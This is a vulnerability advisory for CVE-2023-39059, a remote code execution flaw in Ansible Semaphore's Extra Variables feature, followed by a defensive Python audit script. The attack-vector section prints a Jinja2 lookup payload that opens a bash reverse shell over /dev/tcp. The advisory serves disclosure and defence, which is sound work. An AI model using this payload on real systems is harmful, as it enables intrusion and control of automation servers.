CVE-2023-39059
An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.
---------------------------------------------------------------
[VulnerabilityType Other]
Remote Command Execution (RCE)
---------------------------------------------------------------
[Affected Component]
Ansible Semaphore includes a feature called “Extra Variables.” This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.
---------------------------------------------------------------
[Attack Type]
Remote
---------------------------------------------------------------
[Impact Code execution]
true
---------------------------------------------------------------
[Impact Denial of Service]
true
---------------------------------------------------------------
[Impact Escalation of Privileges]
true
---------------------------------------------------------------
[Impact Information Disclosure]
true
---------------------------------------------------------------
[Attack Vectors]
A malicious user with low privileges can abuse the --extra-vars parameter to achieve Remote Command Execution (RCE), read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the Ansible server. Payload:
{"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"}
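A pre-flight audit for Extra Variables JSON, added here as an example (it is not Semaphore's code or the vendor's fix). It assumes a policy under which extra vars may carry only literal values, so any Jinja2 template expression is reported; the function names and sample documents are hypothetical.

```python
import json
import re

# Jinja2 delimiters: a string value containing one is treated by Ansible as a template.
TEMPLATE_MARKER = re.compile(r"\{\{|\{%|\{#")
# lookup/query/q plugin calls run on the controller when the template is rendered.
LOOKUP_CALL = re.compile(r"\b(?:lookup|query|q)\s*\(")


def _walk(node, path, findings):
    """Recurse through the parsed JSON, recording every templated string value."""
    if isinstance(node, dict):
        for key, value in node.items():
            _walk(value, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            _walk(value, f"{path}[{index}]", findings)
    elif isinstance(node, str) and TEMPLATE_MARKER.search(node):
        reason = ("lookup plugin call inside template"
                  if LOOKUP_CALL.search(node) else "template expression")
        findings.append((path, reason))


def audit_extra_vars(raw):
    """Return (json_path, reason) findings for one Extra Variables document."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        return [("$", f"not valid JSON: {exc.msg}")]
    if not isinstance(data, dict):
        return [("$", "top level must be a JSON object")]
    findings = []
    _walk(data, "$", findings)
    return findings


# Constructed samples (not taken from a real project).
SAMPLE_OK = json.dumps({"app_version": "1.4.2", "ports": [80, 443]})
SAMPLE_BAD = json.dumps({
    "ansible_user": "{{ lookup('ansible.builtin.pipe', 'id') }}",
    "deploy": {"tags": ["web", "{% if x %}y{% endif %}"]},
})

if __name__ == "__main__":
    for name, doc in (("ok", SAMPLE_OK), ("bad", SAMPLE_BAD)):
        print(name, audit_extra_vars(doc))
```

An empty result means the document contains only literal values; any finding names the JSON path to review or reject before the job is queued.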
---------------------------------------------------------------
[Has vendor confirmed]
true
---------------------------------------------------------------
[Discoverer]
@alevsk
---------------------------------------------------------------
[Reference]
https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/
---------------------------------------------------------------
[Vendor of Product]
ansible semaphore
---------------------------------------------------------------
[Affected Product Code Base]
ansible semaphore v2.8.90
---------------------------------------------------------------